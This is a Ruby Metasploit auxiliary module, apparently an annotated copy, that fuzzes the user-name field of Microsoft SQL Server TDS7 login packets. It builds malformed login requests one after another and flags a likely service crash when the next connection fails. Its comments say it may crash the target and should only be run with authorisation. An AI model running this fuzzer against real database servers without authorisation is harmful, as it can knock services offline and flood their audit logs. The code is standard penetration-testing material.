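##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Fuzzes the user-name field of the TDS7 LOGIN7 request. Every attempt is a
# failed login (fuzzed user name, empty password), so against a monitored
# target this generates failed-login audit events and, by design, may crash
# the service. Run it only against systems you are authorised to test.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL
  include Msf::Auxiliary::Fuzzer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'TDS Protocol Login Request Username Fuzzer',
      'Description' => %q{
        This module sends a series of malformed TDS login requests.
      },
      'Author'      => [ 'hdm' ],
      'License'     => MSF_LICENSE
    ))
  end

  # Builds and sends one TDS7 LOGIN7 request. This is a copy of the mixin's
  # mssql_login in which every field can be overridden through +opts+, so a
  # fuzzer can inject a malformed value into exactly one place per attempt.
  #
  # Recognised keys (all optional; the defaults form a plausible login):
  #   :tds_version, :size, :version, :pid, :connection_id, :flags_opt1,
  #   :flags_opt2, :flags_sql_type, :flags_reserved, :timezone, :collation
  #                -- fixed-width header fields, packed little-endian
  #   :cname       client host name (random alpha if absent)
  #   :uname       user name ("sa" if absent)
  #   :pname       password, passed through mssql_tds_encrypt ("" if absent)
  #   :pname_raw   pre-encoded password bytes, used verbatim instead of :pname
  #   :aname       application name (random alpha; also reused for the
  #                library-name slot, as in the original)
  #   :sname       server name (rhost if absent)
  #   :dname       database name ("" if absent)
  #   :timeout     read timeout handed to mssql_send_recv
  #
  # Side effects: drops any existing socket, opens a new one and sets
  # @connected once connect has succeeded (run uses that to tell a dead
  # service from a parse error). Returns whatever mssql_parse_reply returns
  # for the response; the seed hash always carries an :errors array.
  def do_login(opts = {})
    @connected = false
    disconnect if self.sock
    connect
    @connected = true

    db = ''

    # Fixed-width part of the LOGIN7 header. The leading dword is the total
    # length and is patched in once the packet is complete.
    pkt = [
      0x00000000,                          # total length (placeholder)
      opts[:tds_version] || 0x71000001,    # TDS version
      opts[:size] || 0x00000000,           # packet size
      opts[:version] || 0x00000007,        # client program version
      opts[:pid] || rand(1024 + 1),        # client PID
      opts[:connection_id] || 0x00000000,  # connection ID
      opts[:flags_opt1] || 0xe0,           # option flags 1
      opts[:flags_opt2] || 0x03,           # option flags 2
      opts[:flags_sql_type] || 0x00,       # SQL type flags
      opts[:flags_reserved] || 0x00,       # reserved flags
      opts[:timezone] || 0x00000000,       # client time zone
      opts[:collation] || 0x00000000       # collation / LCID
    ].pack('VVVVVVCCCCVV')

    # Variable-length fields are UTF-16LE. The password goes through the
    # mixin's mssql_tds_encrypt -- NOTE(review): presumably the reversible
    # TDS password obfuscation, not confidentiality; confirm in the mixin.
    # :pname_raw bypasses it so a caller can supply arbitrary bytes.
    cname = Rex::Text.to_unicode(opts[:cname] || Rex::Text.rand_text_alpha(rand(8) + 1))
    uname = Rex::Text.to_unicode(opts[:uname] || 'sa')
    pname = opts[:pname_raw] || mssql_tds_encrypt(opts[:pname] || '')
    aname = Rex::Text.to_unicode(opts[:aname] || Rex::Text.rand_text_alpha(rand(8) + 1))
    sname = Rex::Text.to_unicode(opts[:sname] || rhost)
    dname = Rex::Text.to_unicode(opts[:dname] || db)

    # Offset/length table: nine (byte offset, char count) pairs = 36 bytes,
    # then a 6-byte client ID and two more pairs = 14 bytes. The first
    # string therefore starts 50 bytes past the current end of the header.
    # Offsets and counts are 16-bit ('v'); strings are two bytes per char,
    # so the count is bytes / 2. Values over 0xffff wrap silently -- that
    # yields a malformed-but-sendable packet, which a fuzzer may want.
    idx = pkt.size + 50

    add_field = lambda do |str|
      pkt << [idx, str.length / 2].pack('vv')
      idx += str.length
    end

    add_field.call(cname)       # client host name
    add_field.call(uname)       # user name
    add_field.call(pname)       # password
    add_field.call(aname)       # application name
    add_field.call(sname)       # server name
    pkt << [0, 0].pack('vv')    # unused slot
    add_field.call(aname)       # library name (reuses the app name)
    pkt << [idx, 0].pack('vv')  # language: present but empty
    add_field.call(dname)       # database name

    # Client ID (6 bytes) followed by two offset/length pairs that must
    # carry the final packet length. Remember where they sit instead of
    # searching for the 0x12345678 byte pattern afterwards: a caller-chosen
    # offset/count in the table above could reproduce that pattern and make
    # the search patch the wrong bytes.
    len_at = pkt.size + 6
    pkt << [0, 0, 0x12345678, 0x12345678].pack('vVVV')

    pkt << cname << uname << pname << aname << sname << aname << dname

    # Total length goes into the leading dword and into both trailing pairs
    # (for lengths under 64K each pair reads as offset = length, count = 0,
    # because 'V' stores the low word first).
    total = [pkt.length].pack('V')
    pkt[0, 4] = total
    pkt[len_at, 8] = total * 2

    # TDS packet header: type 0x10 (TDS7 login), status 0x01 (end of
    # message), big-endian length including these 8 header bytes, then
    # presumably SPID 0, packet id 1 and window 0 per the TDS header layout.
    pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt

    resp = mssql_send_recv(pkt, opts[:timeout])

    info = { :errors => [] }
    mssql_parse_reply(resp, info)
  end

  # Drives the fuzzer: one login attempt per string from fuzz_strings, with
  # the string placed in the user-name field. A connect failure after a
  # previous successful attempt is reported as a probable crash together
  # with the string that preceded it, since that string is the likely cause.
  def run
    last_str = nil   # previous fuzz string -- the suspect if the next connect fails
    last_inp = nil   # @last_fuzzer_input for that string (set by the Fuzzer mixin, presumably)
    last_err = nil

    cnt = 0
    fuzz_strings do |str|
      # Counts and offsets in the LOGIN7 table are 16-bit; drop inputs that
      # cannot be expressed there at all.
      next if str.length > 65535
      cnt += 1

      print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}") if (cnt % 100).zero?

      begin
        do_login(:uname => str, :timeout => 0.50)
      rescue ::Interrupt
        print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")
        raise
      rescue ::StandardError => e
        # StandardError, not Exception: the broader rescue also swallowed
        # SystemExit/NoMemoryError/SignalException and then either kept
        # fuzzing or misreported them as a target crash.
        last_err = e
      ensure
        disconnect
      end

      # @connected stays false only if connect itself failed.
      unless @connected
        if last_str
          print_status("The service may have crashed: method=#{last_inp} string=#{last_str.unpack("H*")[0]} error=#{last_err}")
        else
          print_status("Could not connect to the service: #{last_err}")
        end
        return
      end

      last_str = str
      last_inp = @last_fuzzer_input
    end
  end
end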